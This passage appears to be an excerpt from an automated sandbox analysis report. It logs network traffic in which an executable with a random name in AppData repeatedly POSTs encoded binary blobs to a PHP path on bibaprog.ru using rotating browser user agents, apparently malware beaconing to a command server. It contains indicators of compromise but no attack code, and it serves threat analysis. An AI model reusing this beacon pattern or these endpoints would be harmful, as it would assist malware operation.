                                                          Jan 13, 2025 13:40:44.998367071 CET8049996104.21.64.1192.168.2.5
                                                          Jan 13, 2025 13:40:44.998519897 CET4999680192.168.2.5104.21.64.1
                                                          Jan 13, 2025 13:40:44.998869896 CET4999680192.168.2.5104.21.64.1
                                                          Jan 13, 2025 13:40:45.003660917 CET8049996104.21.64.1192.168.2.5
                                                          Jan 13, 2025 13:40:45.351239920 CET4999680192.168.2.5104.21.64.1
                                                          Jan 13, 2025 13:40:45.356132030 CET8049996104.21.64.1192.168.2.5
                                                          Jan 13, 2025 13:40:45.452538967 CET8049996104.21.64.1192.168.2.5
                                                          Jan 13, 2025 13:40:45.506195068 CET4999680192.168.2.5104.21.64.1
                                                          Jan 13, 2025 13:40:45.678194046 CET8049996104.21.64.1192.168.2.5
                                                          Jan 13, 2025 13:40:45.727325916 CET4999680192.168.2.5104.21.64.1
                                                          Jan 13, 2025 13:40:46.161680937 CET4999680192.168.2.5104.21.64.1
                                                          Jan 13, 2025 13:40:56.324413061 CET4999780192.168.2.5104.21.64.1
                                                          Jan 13, 2025 13:40:56.329583883 CET8049997104.21.64.1192.168.2.5
                                                          Jan 13, 2025 13:40:56.329694033 CET4999780192.168.2.5104.21.64.1
                                                          Jan 13, 2025 13:40:56.330138922 CET4999780192.168.2.5104.21.64.1
                                                          Jan 13, 2025 13:40:56.334975958 CET8049997104.21.64.1192.168.2.5
                                                          Jan 13, 2025 13:40:56.678443909 CET4999780192.168.2.5104.21.64.1
                                                          Jan 13, 2025 13:40:56.683432102 CET8049997104.21.64.1192.168.2.5
                                                          Jan 13, 2025 13:40:56.793078899 CET8049997104.21.64.1192.168.2.5
                                                          Jan 13, 2025 13:40:56.849991083 CET4999780192.168.2.5104.21.64.1
                                                          Jan 13, 2025 13:40:57.021229029 CET8049997104.21.64.1192.168.2.5
                                                          Jan 13, 2025 13:40:57.068923950 CET4999780192.168.2.5104.21.64.1
                                                          Jan 13, 2025 13:40:57.108231068 CET4999780192.168.2.5104.21.64.1
                                                          Jan 13, 2025 13:41:07.357198000 CET4999880192.168.2.5104.21.64.1
                                                          Jan 13, 2025 13:41:07.363202095 CET8049998104.21.64.1192.168.2.5
                                                          Jan 13, 2025 13:41:07.363339901 CET4999880192.168.2.5104.21.64.1
                                                          Jan 13, 2025 13:41:07.363792896 CET4999880192.168.2.5104.21.64.1
                                                          Jan 13, 2025 13:41:07.368697882 CET8049998104.21.64.1192.168.2.5
                                                          Jan 13, 2025 13:41:07.709794998 CET4999880192.168.2.5104.21.64.1
                                                          Jan 13, 2025 13:41:07.715118885 CET8049998104.21.64.1192.168.2.5
                                                          Jan 13, 2025 13:41:07.807852030 CET8049998104.21.64.1192.168.2.5
                                                          Jan 13, 2025 13:41:07.849997997 CET4999880192.168.2.5104.21.64.1
                                                          Jan 13, 2025 13:41:08.036006927 CET8049998104.21.64.1192.168.2.5
                                                          Jan 13, 2025 13:41:08.084373951 CET4999880192.168.2.5104.21.64.1
                                                          Jan 13, 2025 13:41:08.108423948 CET4999880192.168.2.5104.21.64.1
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 13, 2025 13:37:12.277041912 CET5679453192.168.2.51.1.1.1
                                                          Jan 13, 2025 13:37:12.439838886 CET53567941.1.1.1192.168.2.5
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 13, 2025 13:37:12.277041912 CET192.168.2.51.1.1.10x2e57Standard query (0)bibaprog.ruA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 13, 2025 13:37:12.439838886 CET1.1.1.1192.168.2.50x2e57No error (0)bibaprog.ru104.21.64.1A (IP address)IN (0x0001)false
                                                          Jan 13, 2025 13:37:12.439838886 CET1.1.1.1192.168.2.50x2e57No error (0)bibaprog.ru104.21.80.1A (IP address)IN (0x0001)false
                                                          Jan 13, 2025 13:37:12.439838886 CET1.1.1.1192.168.2.50x2e57No error (0)bibaprog.ru104.21.32.1A (IP address)IN (0x0001)false
                                                          Jan 13, 2025 13:37:12.439838886 CET1.1.1.1192.168.2.50x2e57No error (0)bibaprog.ru104.21.16.1A (IP address)IN (0x0001)false
                                                          Jan 13, 2025 13:37:12.439838886 CET1.1.1.1192.168.2.50x2e57No error (0)bibaprog.ru104.21.112.1A (IP address)IN (0x0001)false
                                                          Jan 13, 2025 13:37:12.439838886 CET1.1.1.1192.168.2.50x2e57No error (0)bibaprog.ru104.21.48.1A (IP address)IN (0x0001)false
                                                          Jan 13, 2025 13:37:12.439838886 CET1.1.1.1192.168.2.50x2e57No error (0)bibaprog.ru104.21.96.1A (IP address)IN (0x0001)false
                                                          • bibaprog.ru
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.549704104.21.64.1802520C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:37:12.451575994 CET347OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:37:12.803474903 CET344OUTData Raw: 00 03 04 03 06 01 04 00 05 06 02 01 02 07 01 05 00 04 05 00 02 07 03 09 00 04 0d 00 07 00 01 05 0c 02 03 01 01 06 04 07 0c 0b 07 51 06 07 05 05 04 53 0c 0e 0a 02 01 07 04 02 03 0c 04 04 05 58 01 0a 0d 0b 05 03 05 01 0e 02 0d 06 0f 0c 0f 08 04 03
                                                          Data Ascii: QSX]USW\L~k^r`\Su[|kUfYwBh|co_ll`_zsv|}xCcgtj_~V@A{ST}Lu
                                                          Jan 13, 2025 13:37:12.902009964 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:37:13.141153097 CET1018INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:37:13 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LISi%2FyKNQHOROXN0SwqwNEZf6NVi2PaPrD8%2BkzPc6flTPWKpvYWWjiTU8nG%2BuUkWaHPJPMZUHGfYFnXaNmYJtbYhUIGDUOIjLozIkFwX4eGbTLAVPNVZ8I%2FY6rfepw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 90156fb35dae4414-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3400&min_rtt=1691&rtt_var=4052&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=95027&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.549745104.21.64.1806512C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:37:24.403089046 CET282OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:37:24.770590067 CET344OUTData Raw: 00 07 01 07 06 09 01 03 05 06 02 01 02 02 01 01 00 0b 05 0f 02 07 03 00 02 54 0a 04 06 05 01 06 0a 02 04 0c 01 04 03 0b 0e 54 06 05 04 03 04 02 03 00 0b 0a 0d 04 04 0b 04 03 05 05 05 00 06 0b 03 06 0f 0a 06 06 04 54 0e 0e 0c 52 0d 01 0c 03 02 00
                                                          Data Ascii: TTTR^\L}R|pi_`b[buThB}t`M^oBsEl^i_}nhtgo_je~V@xSP}LW
                                                          Jan 13, 2025 13:37:24.851700068 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:37:25.096684933 CET1014INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:37:25 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FRWxU10oe72zy83fkiUiOToSFQ8f7imE45wdMCVE31EHtK7R0EONs11BCWTsUVH6nsKRaUWjIdKio9PDE83nc0m2imGuBKJdC95V6n%2BisQzkFOjf%2B0AQ2XtOcUb3TA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 90156ffe0c724414-EWR
                                                          alt-svc: h2=":443"; ma=60
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3236&min_rtt=1663&rtt_var=3771&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=626&delivery_rate=102427&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.549796104.21.64.1802876C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:37:32.332403898 CET294OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:37:32.677859068 CET344OUTData Raw: 00 01 04 0d 06 01 01 0a 05 06 02 01 02 01 01 00 00 02 05 0c 02 01 03 09 02 0e 0a 04 03 0f 06 07 0f 54 06 0b 02 07 06 04 0c 04 02 01 07 00 05 52 06 54 0f 0b 0f 55 04 57 06 03 04 56 04 0b 00 0a 03 03 0e 00 07 06 06 03 0e 54 0b 01 0c 54 0f 03 06 0c
                                                          Data Ascii: TRTUWVTT[XQSP\L~^}Zcb[u`Ak|ivk_|phlR]{s~DhSRwIU[je~V@xCr~bu
                                                          Jan 13, 2025 13:37:32.817519903 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:37:33.032058001 CET1015INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:37:32 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a23IktWnlu2tWtgHtkKgFX1IL80EvtYftf9uzgV4rW24X2Rwb8J1pqmRQ8whQbujtrA2lrDxRbDNHLmcmRLN%2BWUb7BWmIrn%2Bb3HH65GvS%2B8VAW7wQ%2BwiZiNRElkedw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 9015702fb9108ca1-EWR
                                                          alt-svc: h2=":443"; ma=60
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4288&min_rtt=1970&rtt_var=5376&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=71146&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.549872104.21.64.1805340C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:37:44.318007946 CET347OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:37:44.662259102 CET344OUTData Raw: 00 01 04 03 03 0b 01 05 05 06 02 01 02 06 01 02 00 06 05 09 02 03 03 00 01 06 0e 0d 03 03 00 07 0d 51 06 5b 03 54 06 06 0b 0a 07 06 04 04 02 02 06 01 0c 5b 0a 02 05 01 07 00 07 06 05 01 05 0f 00 01 0d 01 07 51 06 04 0f 0e 0c 07 0f 51 0d 07 06 54
                                                          Data Ascii: Q[T[QQTQV\L}T|`q\wLSwvlhBv\c|x]RlRxZxjK}moPtYZAu~V@BxmbN~LW
                                                          Jan 13, 2025 13:37:44.766022921 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:37:44.993552923 CET1017INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:37:44 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hJ%2FCVGNmpoaoaxr0pQC0jxHidgbekhRyFoCWL91PWn4kO3CPjoYzbM%2FU2EBJth9ATjFJM6JbJ05pj%2F7iNnMhgyPkugBRm2JpMAEql53nXwHdbd9Kzm3GzFHTteWeIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 9015707a89bdc358-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2913&min_rtt=1681&rtt_var=3095&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=126505&cwnd=154&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.549919104.21.64.1805296C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:37:51.942455053 CET347OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:37:52.287398100 CET344OUTData Raw: 00 03 04 04 06 0b 04 01 05 06 02 01 02 0d 01 0b 00 00 05 0a 02 01 03 00 02 04 0f 0d 04 57 02 07 0e 01 03 00 01 01 03 03 0b 05 02 07 06 01 04 04 05 03 0d 0f 0a 07 04 52 06 54 04 0d 05 07 06 08 05 06 0e 0f 06 0f 06 55 0e 01 0c 04 0e 03 0e 08 05 07
                                                          Data Ascii: WRTU[RQS\L~N|jt[}MaeQS~lu`lxhc{[lUol`W^CkP`Yk[}O~V@z}zO~bW
                                                          Jan 13, 2025 13:37:52.391191959 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:37:52.622592926 CET1025INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:37:52 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XxtWvZsvycmc%2F0rFVkRccosdL16ecCqJM1CuIaYf%2BrVMocYf20cD%2F%2BYAY07iD3srtOIhagZ0AArjBssIbWgHZl6OiJhrkDSAx7AsDABSsssVB1b804E%2FN3M1%2F%2Fmqqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 901570aa2db98ca1-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3614&min_rtt=2363&rtt_var=3388&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=118008&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.549980104.21.64.1807060C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:38:04.746824980 CET347OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:38:05.099750042 CET344OUTData Raw: 00 02 04 05 06 0c 04 07 05 06 02 01 02 0c 01 0a 00 07 05 0d 02 00 03 08 00 02 0d 04 07 02 00 01 0d 01 06 5b 01 03 06 00 0d 04 06 06 05 03 02 04 07 02 0c 5d 0d 53 07 52 07 07 07 06 05 05 04 0e 02 07 0f 5c 07 05 06 01 0c 01 0b 01 0f 0d 0b 08 07 0d
                                                          Data Ascii: []SR\Q\L~pzt\av[xitll`pKy|QxNvKhm``gxN}_~V@zmf~rq
                                                          Jan 13, 2025 13:38:05.199692011 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:38:05.467933893 CET1024INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:38:05 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVmKRnzS2Ne105hqKBpaMTQtf3IBZibIRToJPtDT0Xl%2BA89RNCPSY33KLVLMpup%2FfE%2BuNylKcbH8%2BQ0Ikk0ET%2Bp%2BPCqbHqlFQFF4fiZWmuJo4jU6SOgOPetcrClU%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 901570fa39b07c6a-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3944&min_rtt=2004&rtt_var=4632&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=83290&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.549981104.21.64.1804820C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:38:12.856420994 CET294OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:38:13.209248066 CET344OUTData Raw: 00 02 04 00 03 0b 01 03 05 06 02 01 02 01 01 00 00 01 05 0a 02 01 03 0f 02 52 0a 0d 03 04 02 05 0e 0f 05 0c 02 0c 07 05 0b 03 05 03 05 06 05 04 05 05 0c 0a 0c 04 04 56 05 0f 06 07 06 51 00 0d 02 57 0c 01 00 06 07 01 0f 02 0c 0e 0e 01 0e 04 02 06
                                                          Data Ascii: RVQW\\L~|cu_cb[Lv[Z~luOcRZ~c|K{Bl[l^a^|noPtgZ}e~V@xC~O~bS
                                                          Jan 13, 2025 13:38:13.300182104 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:38:13.531755924 CET1013INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:38:13 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XoQCe17d%2FgQqHI26kTCODwJNWZyFRDNoz7te71K4odsXpHYZHXLvfgTZze7YOV3r4fL%2FEdjr4f9aAYc3fHbQA8p6p76sNzg31LfxQgRKsum9%2F9Po6MeizqCdxQdfVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
